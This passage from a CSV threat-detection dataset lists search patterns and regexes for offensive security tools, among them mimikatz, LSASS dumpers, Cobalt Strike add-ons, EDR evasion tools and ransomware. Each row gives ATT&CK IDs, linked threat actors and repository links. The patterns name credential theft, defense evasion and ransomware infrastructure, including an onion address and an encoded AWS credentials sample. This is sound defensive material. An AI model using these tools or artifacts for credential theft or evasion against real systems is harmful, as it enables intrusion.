they can be used for privilege escalation by pentesters/red teamers.","T1210.001 - T1190 - T1059 - T1213","TA0007 - TA0002 - TA0008 - TA0011","N/A","N/A","Vulnerability Scanner","https://github.com/vulmon/Vulmap","1","1","#linux #windows","N/A","10","10","965","194","2023-03-18T23:56:41Z","2018-09-07T15:49:36Z","62298" "*Vulnerabilities/RPCDump*",".{0,1000}Vulnerabilities\/RPCDump.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","62299" "*Vulnerable Web Enrollment endpoint identified: http://*/certsrv/certsnsh.asp*",".{0,1000}Vulnerable\sWeb\sEnrollment\sendpoint\sidentified\:\shttp\:\/\/.{0,1000}\/certsrv\/certsnsh\.asp.{0,1000}","offensive_tool_keyword","adcshunter","Uses rpcdump to locate the ADCS server and identify if ESC8 is vulnerable from unauthenticated perspective.","T1018 - T1087 - T1046 - T1201 - T1595","TA0007 - TA0043","N/A","N/A","Discovery","https://github.com/danti1988/adcshunter","1","0","N/A","N/A","7","1","80","7","2024-09-13T12:50:50Z","2023-12-14T14:31:05Z","62300" "*vulnfactory.org/exploits/*.c*",".{0,1000}vulnfactory\.org\/exploits\/.{0,1000}\.c.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","#linux","N/A","10","10","5909","1133","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z","62301" "*vulns/apache.txt*",".{0,1000}vulns\/apache\.txt.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - 
TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","1","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","62302" "*vulns/iis.txt*",".{0,1000}vulns\/iis\.txt.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","1","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","62303" "*vulns/jrun.txt*",".{0,1000}vulns\/jrun\.txt.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","1","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","62304" "*vulns/tomcat.txt*",".{0,1000}vulns\/tomcat\.txt.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","1","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","62305" "*vulnweb.com/FUZZ*",".{0,1000}vulnweb\.com\/FUZZ.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","1","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","62306" "*vu-ls/Crassus*",".{0,1000}vu\-ls\/Crassus.{0,1000}","offensive_tool_keyword","Crassus","Crassus Windows privilege escalation discovery tool","T1068 - T1003 - T1003.003 - T1046","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/vu-ls/Crassus","1","1","N/A","N/A","10","6","571","59","2024-11-08T14:11:39Z","2023-01-12T21:01:52Z","62308" 
"*VVRKek1WVkdaM2RpUmtaWlRVZG9VVlpVUmxKYU1VSlVVVmMxWVUxcWJESlhha28wWWtacmVXRkliR2xOYWtaelYxWm9WMDFIU2pWT1dIQmhWMFZ2ZVZkc1pITmxWbXcxVGxkd2FVMXFRblZSTW5RMFUxWlJlRlJzVmtwU1JFSnVVMjV3Ums1Vk1YQk9TR2hQWVcxa01WUldUVEJsYTNBelkwVXhWbEpVYkZSV2EwNUNUMVZzUlZWVVFrNWtNMEpXVlRGVmVGSnNaM2h*",".{0,1000}VVRKek1WVkdaM2RpUmtaWlRVZG9VVlpVUmxKYU1VSlVVVmMxWVUxcWJESlhha28wWWtacmVXRkliR2xOYWtaelYxWm9WMDFIU2pWT1dIQmhWMFZ2ZVZkc1pITmxWbXcxVGxkd2FVMXFRblZSTW5RMFUxWlJlRlJzVmtwU1JFSnVVMjV3Ums1Vk1YQk9TR2hQWVcxa01WUldUVEJsYTNBelkwVXhWbEpVYkZSV2EwNUNUMVZzUlZWVVFrNWtNMEpXVlRGVmVGSnNaM2h.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","#base64","N/A","10","10","606","145","2024-10-29T16:56:39Z","2016-06-09T10:49:54Z","62309" "*vxCrypt0r/Voidgate*",".{0,1000}vxCrypt0r\/Voidgate.{0,1000}","offensive_tool_keyword","Voidgate","bypass AV/EDR memory scanners. 
This can be used to hide well-known and detected shellcodes","T1027 - T1070 - T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/undergroundwires/privacy.sexy","1","1","N/A","N/A","9","10","4632","198","2025-04-21T21:36:39Z","2019-12-31T14:38:28Z","62310" "*VXpCMk1UTjBjMU14YkhZemNsSTBibk13YlhjMGNqTQ*",".{0,1000}VXpCMk1UTjBjMU14YkhZemNsSTBibk13YlhjMGNqTQ.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","N/A","10","3","252","80","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z","62311" "*vyrus001/go-mimikatz*",".{0,1000}vyrus001\/go\-mimikatz.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/vyrus001/go-mimikatz","1","1","N/A","N/A","10","7","619","105","2022-09-08T18:14:20Z","2015-10-22T08:43:38Z","62312" "*vysecurity/ANGRYPUPPY*",".{0,1000}vysecurity\/ANGRYPUPPY.{0,1000}","offensive_tool_keyword","cobaltstrike","Bloodhound Attack Path Automation in CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - 
TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/vysecurity/ANGRYPUPPY","1","1","N/A","N/A","10","10","316","87","2020-04-26T17:35:31Z","2017-07-11T14:18:07Z","62313" "*vzzf6yg67cffqndnwg56e4psw45rup45f2mis7bwblg5fs7e5voagsqd.onion*",".{0,1000}vzzf6yg67cffqndnwg56e4psw45rup45f2mis7bwblg5fs7e5voagsqd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","62314" "*-w *wordlists*.txt*",".{0,1000}\-w\s.{0,1000}wordlists.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1046 - T1590.002 - T1590.005","TA0007 - TA0043 - TA0006","N/A","Volatile Cedar","Reconnaissance","https://github.com/OJ/gobuster","1","0","#linux","network exploitation tool","N/A","10","11434","1338","2025-04-17T06:41:43Z","2014-11-14T13:18:35Z","62315" "*'W','i','n','d','o','w','s','\\','S','y','s','t','e','m','3','2'*",".{0,1000}\'W\',\'i\',\'n\',\'d\',\'o\',\'w\',\'s\',\'\\\\\',\'S\',\'y\',\'s\',\'t\',\'e\',\'m\',\'3\',\'2\'.{0,1000}","offensive_tool_keyword","DumpThatLSASS","Dumping LSASS by Unhooking MiniDumpWriteDump by getting 
a fresh DbgHelp.dll copy from the disk","T1003 - T1055.011 - T1027 - T1564.001","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/peiga/DumpThatLSASS","1","0","N/A","N/A","10","1","31","79","2022-09-24T22:39:04Z","2022-09-24T22:41:19Z","62316" "*'W','i','n','d','o','w','s','\\','S','y','s','t','e','m','3','2',*",".{0,1000}\'W\',\'i\',\'n\',\'d\',\'o\',\'w\',\'s\',\'\\\\\',\'S\',\'y\',\'s\',\'t\',\'e\',\'m\',\'3\',\'2\',.{0,1000}","offensive_tool_keyword","killer","evade AVs and EDRs or security tools","T1564 - T1027 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xHossam/Killer","1","0","N/A","N/A","10","9","804","128","2024-07-02T10:24:43Z","2023-04-08T16:29:52Z","62317" "*w00tw00tw00t*",".{0,1000}w00tw00tw00t.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","62318" "*W0lLRUVYVF0NCk1FRElBPXJhc3RhcGkNClBvcnQ9VlBOMi0wDQpEZXZpY2U9V2FuIE1pbmlwb3J0IChJS0V2MikNCkRFVklDRT12cG4NClBob25lTnVtYmVyPTEyNy4wLjAuMQ==*",".{0,1000}W0lLRUVYVF0NCk1FRElBPXJhc3RhcGkNClBvcnQ9VlBOMi0wDQpEZXZpY2U9V2FuIE1pbmlwb3J0IChJS0V2MikNCkRFVklDRT12cG4NClBob25lTnVtYmVyPTEyNy4wLjAuMQ\=\=.{0,1000}","offensive_tool_keyword","Ikeext-Privesc","Windows IKEEXT DLL Hijacking Exploit Tool","T1546.011 - T1574.009 - T1036.004","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/securycore/Ikeext-Privesc","1","0","N/A","N/A","10","1","33","52","2018-02-25T13:45:15Z","2018-02-27T11:18:56Z","62319" "*W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQw==*",".{0,1000}W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQw\=\=.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script 
Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","#base64","N/A","9","6","559","81","2023-04-21T12:49:37Z","2021-04-13T10:22:05Z","62320" "*W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkVDQg==*",".{0,1000}W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkVDQg\=\=.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","#base64","N/A","9","6","559","81","2023-04-21T12:49:37Z","2021-04-13T10:22:05Z","62321" "*W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpaZXJvcw==*",".{0,1000}W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpaZXJvcw\=\=.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","#base64","N/A","9","6","559","81","2023-04-21T12:49:37Z","2021-04-13T10:22:05Z","62322" "*W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpBTlNJWDkyMw==*",".{0,1000}W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpBTlNJWDkyMw\=\=.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","#base64","N/A","9","6","559","81","2023-04-21T12:49:37Z","2021-04-13T10:22:05Z","62323" "*W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpJU08xMDEyNg==*",".{0,1000}W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpJU08xMDEyNg\=\=.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense 
Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","#base64","N/A","9","6","559","81","2023-04-21T12:49:37Z","2021-04-13T10:22:05Z","62324" "*W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpQS0NTNw==*",".{0,1000}W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpQS0NTNw\=\=.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","#base64","N/A","9","6","559","81","2023-04-21T12:49:37Z","2021-04-13T10:22:05Z","62325" "*W2F1dG9ydW5dDQpzaGVsbGV4ZWN1dGU9eTMyNHNlZHguZXhlDQppY29uPSVTeXN0ZW1Sb290JVxzeXN0ZW0zMlxTSEVMTDMyLmRsbCw0DQphY3Rpb249T3BlbiBmb2xkZXIgdG8gdmlldyBmaWxlcw0Kc2hlbGxcZGVmYXVsdD1PcGVuDQpzaGVsbFxkZWZhdWx0XGNvbW1hbmQ9eTMyNHNlZHguZXhlDQpzaGVsbD1kZWZhdWx0*",".{0,1000}W2F1dG9ydW5dDQpzaGVsbGV4ZWN1dGU9eTMyNHNlZHguZXhlDQppY29uPSVTeXN0ZW1Sb290JVxzeXN0ZW0zMlxTSEVMTDMyLmRsbCw0DQphY3Rpb249T3BlbiBmb2xkZXIgdG8gdmlldyBmaWxlcw0Kc2hlbGxcZGVmYXVsdD1PcGVuDQpzaGVsbFxkZWZhdWx0XGNvbW1hbmQ9eTMyNHNlZHguZXhlDQpzaGVsbD1kZWZhdWx0.{0,1000}","offensive_tool_keyword","EDRaser","EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.","T1070.004 - T1027 - T1564.001","TA0005 - TA0040 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","1","N/A","N/A","10","4","363","49","2024-04-06T17:42:40Z","2023-08-10T04:30:45Z","62326" 
"*W2F1dG9ydW5dDQpzaGVsbGV4ZWN1dGU9eTMyNHNlZHguZXhlDQppY29uPSVTeXN0ZW1Sb290JVxzeXN0ZW0zMlxTSEVMTDMyLmRsbCw0DQphY3Rpb249T3BlbiBmb2xkZXIgdG8gdmlldyBmaWxlcw0Kc2hlbGxcZGVmYXVsdD1PcGVuDQpzaGVsbFxkZWZhdWx0XGNvbW1hbmQ9eTMyNHNlZHguZXhlDQpzaGVsbD1kZWZhdWx0*",".{0,1000}W2F1dG9ydW5dDQpzaGVsbGV4ZWN1dGU9eTMyNHNlZHguZXhlDQppY29uPSVTeXN0ZW1Sb290JVxzeXN0ZW0zMlxTSEVMTDMyLmRsbCw0DQphY3Rpb249T3BlbiBmb2xkZXIgdG8gdmlldyBmaWxlcw0Kc2hlbGxcZGVmYXVsdD1PcGVuDQpzaGVsbFxkZWZhdWx0XGNvbW1hbmQ9eTMyNHNlZHguZXhlDQpzaGVsbD1kZWZhdWx0.{0,1000}","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","Equation Group","C2","https://github.com/APT64/EternalHushFramework","1","0","N/A","N/A","10","10","11","1","2023-10-28T13:08:06Z","2023-07-09T09:13:21Z","62327" "*W2RlZmF1bHRdCmF3c19hY2Nlc3Nfa2V5X2lkID0gQUtJQTM1T0hYMkRTT1pHNjQ3TkgKYXdzX3NlY3JldF9hY2Nlc3Nfa2V5ID0gUXk5OVMrWkIvQ1dsRk50eFBBaWQ3Z0d6dnNyWGhCQjd1ckFDQUxwWgpvdXRwdXQgPSBqc29uCnJlZ2lvbiA9IHVzLWVhc3QtMg==*",".{0,1000}W2RlZmF1bHRdCmF3c19hY2Nlc3Nfa2V5X2lkID0gQUtJQTM1T0hYMkRTT1pHNjQ3TkgKYXdzX3NlY3JldF9hY2Nlc3Nfa2V5ID0gUXk5OVMrWkIvQ1dsRk50eFBBaWQ3Z0d6dnNyWGhCQjd1ckFDQUxwWgpvdXRwdXQgPSBqc29uCnJlZ2lvbiA9IHVzLWVhc3QtMg\=\=.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. 
This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","0","#base64 #linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","62328" "*W2RlZmF1bHRdCmF3c19zZWNyZXRfYWNjZXNzX2tleSA9IFF5OTlTK1pCL0NXbEZOdHhQQWlkN2dHenZzclhoQkI3dXJBQ0FMcFoKYXdzX2FjY2Vzc19rZXlfaWQgPSBBS0lBMzVPSFgyRFNPWkc2NDdOSApvdXRwdXQgPSBqc29uCnJlZ2lvbiA9IHVzLWVhc3QtMg==*",".{0,1000}W2RlZmF1bHRdCmF3c19zZWNyZXRfYWNjZXNzX2tleSA9IFF5OTlTK1pCL0NXbEZOdHhQQWlkN2dHenZzclhoQkI3dXJBQ0FMcFoKYXdzX2FjY2Vzc19rZXlfaWQgPSBBS0lBMzVPSFgyRFNPWkc2NDdOSApvdXRwdXQgPSBqc29uCnJlZ2lvbiA9IHVzLWVhc3QtMg\=\=.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","0","#base64 #linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","62329" "*W2V4cGVyaW1lbnRhbF0gcGF0Y2ggVGVybWluYWwgU2VydmVyIHNlcnZpY2UgdG8gYWxsb3cgbXVsdGlwbGVzIHVzZXJz*",".{0,1000}W2V4cGVyaW1lbnRhbF0gcGF0Y2ggVGVybWluYWwgU2VydmVyIHNlcnZpY2UgdG8gYWxsb3cgbXVsdGlwbGVzIHVzZXJz.{0,1000}","offensive_tool_keyword","BetterSafetyKatz","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#base64","BetterSafetyKatz","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","62330" 
"*W2V4cGVyaW1lbnRhbF0gcGF0Y2ggVGVybWluYWwgU2VydmVyIHNlcnZpY2UgdG8gYWxsb3cgbXVsdGlwbGVzIHVzZXJz*",".{0,1000}W2V4cGVyaW1lbnRhbF0gcGF0Y2ggVGVybWluYWwgU2VydmVyIHNlcnZpY2UgdG8gYWxsb3cgbXVsdGlwbGVzIHVzZXJz.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#base64","BetterSafetyKatz","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","62331" "*w32-speaking-shellcode.asm*",".{0,1000}w32\-speaking\-shellcode\.asm.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","62335" "*w32-speaking-shellcode.bin*",".{0,1000}w32\-speaking\-shellcode\.bin.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","62336" "*w32-speaking-shellcode-eaf.bin*",".{0,1000}w32\-speaking\-shellcode\-eaf\.bin.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","62337" "*w3af_gui*",".{0,1000}w3af_gui.{0,1000}","offensive_tool_keyword","w3af","w3af is a Web Application Attack and Audit Framework. The projects goal is to create a framework to help you secure your web applications by finding and exploiting all web application vulnerabilities.","T1190 - T1211 - T1220 - T1222 - T1247 - T1592","TA0001 - TA0002 - TA0003 - TA0007 - TA0011","N/A","N/A","Vulnerability Scanner","https://w3af.org/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","62339" "*WaaSMedicPayload.dll*",".{0,1000}WaaSMedicPayload\.dll.{0,1000}","offensive_tool_keyword","PPLmedic","Dump the memory of any PPL with a Userland exploit chain","T1003 - T1055 - T1564.001","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/itm4n/PPLmedic","1","0","N/A","N/A","8","4","333","36","2023-03-17T15:58:24Z","2023-03-10T12:07:01Z","62341" "*WAF-bypass-Cheat-Sheet*",".{0,1000}WAF\-bypass\-Cheat\-Sheet.{0,1000}","offensive_tool_keyword","WAF-bypass-Cheat-Sheet","WAF/IPS/DLP bypass Cheat Sheet","T1210 - T1204 - T1061 - T1133 - T1190","TA0001 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Bo0oM/WAF-bypass-Cheat-Sheet","1","1","N/A","N/A","N/A","5","422","65","2018-11-28T20:34:17Z","2018-11-28T19:34:02Z","62342" "*wafw00f 
https://*",".{0,1000}wafw00f\shttps\:\/\/.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","62343" "*wafw00f*",".{0,1000}wafw00f.{0,1000}","offensive_tool_keyword","wafw00f","To do its magic. WAFW00F does the following Sends a normal HTTP request and analyses the response. this identifies a number of WAF solutions. If that is not successful. it sends a number of (potentially malicious) HTTP requests and uses simple logic to deduce which WAF it is. If that is also not successful. it 